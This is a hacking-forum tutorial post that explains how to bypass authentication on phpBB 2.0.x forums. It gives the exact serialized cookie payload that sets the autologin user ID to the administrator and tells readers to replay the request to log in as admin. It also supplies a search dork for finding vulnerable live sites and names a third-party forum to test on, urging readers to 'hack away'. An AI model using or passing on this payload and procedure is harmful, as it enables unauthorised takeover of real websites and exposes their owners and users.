align=center]Session Handling Authentication Bypass[/align]
[list]
[*]This is a technique that can be used in a lot of attacks, its most well known for hacking PHPBB forums as most of the 2.. are vulnerable to some version of this. [/*:m][/list:u]
[list]
[*]Firstly We Will need Live HTTP Headers Download Here now go to the forum vulnerable to this and load up LiveHttpheaders.[/*:m][/list:u]
[list]
[*]Go to www.targetsite/forum/index.php and refresh the page, now look at LivehttpHeaders and you should get some data on the session, scroll down to cookie and press replacy it should say something like this

"phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=03b10d7157a0d0e435461782369655f6"

this is the data for a visitor, replace the mysql_data with

"phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"

and set the
my_sql sid to 2
(the member number for admin) Press replay and you should be logged in as admin![/*:m][/list:u]
[list]
[*]To find vulnerable sites type in the dork "Powered by PHPBB 2.0.12" (or any other vulnerable version) There are a lot! :D. Then Hack away! To test go onto this site :D http://members.multimania.co.uk/bcforum/phpBB2/index.php [/*:m][/list:u]

[align=center]Thank you for reading i will post pictures if requested and / or a video tutorial for you guys, this is ]Written 100% by Xinapse
[/align][/hide]